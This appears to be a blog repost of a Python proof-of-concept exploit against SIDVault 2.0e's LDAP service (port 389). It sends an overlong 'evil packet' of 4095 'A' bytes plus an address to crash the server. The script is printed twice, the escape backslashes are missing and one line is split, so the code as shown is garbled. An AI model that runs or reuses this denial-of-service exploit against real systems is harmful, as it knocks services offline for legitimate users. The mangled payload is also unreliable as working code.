#!/usr/bin/python
#
# $ ./ldap.py
#
# SIDVault 2.0e Vista Remote Crash Vulnerability (sidvault.exe )
# Tested on Vista Home premium SP1 Windows XP ,SP1,SP2,SP3
# Coded by:asheesh anaconda
# Group DarkShinners
import sys
import socket
addr = "x33xbfx96x7c"
healthpacket = 'x41'*4095 + addr
evilpacket = '0x82x10/x02x01x01cx82x10(x04x82x10x06dc='
evilpacket += healthpacket
evilpacket +=
'nx01x02nx01x00x02x01x00x02x01x00x01x01x00x87x0bobjectClass0x00'
print "[+] Sending evil packet"
print "[+] Wait ladp is getting crashh!!!!!!!!!!!!"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 389))
s.send(evilpacket)
s.close()
#http://www.packetstormsecurity.org/0909-exploits/sidvault20evista-crash.txt
#http://inj3ct0r.com/%5Bremote%5D/1292
#SIDVault is prone to a remote denial-of-service vulnerability.
#Successful exploits allow remote attackers to cause the affected server to stop #responding, denying service to legitimate users.
#SIDVault 2.0e for Windows is vulnerable; other versions may also be affected.
#!/usr/bin/python
#
# $ ./ldap.py
#
# SIDVault 2.0e Vista Remote Crash Vulnerability (sidvault.exe )
# Tested on Vista Home premium SP1 Windows XP ,SP1,SP2,SP3
# Coded by:asheesh anaconda
# Group DarkShinners
import sys
import socket
addr = "x33xbfx96x7c"
healthpacket = 'x41'*4095 + addr
evilpacket = '0x82x10/x02x01x01cx82x10(x04x82x10x06dc='
evilpacket += healthpacket
evilpacket +=
'nx01x02nx01x00x02x01x00x02x01x00x01x01x00x87x0bobjectClass0x00'
print "[+] Sending evil packet"
print "[+] Wait ladp is getting crashh!!!!!!!!!!!!"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 389))
s.send(evilpacket)
s.close()
Subscribe to:
Posts (Atom)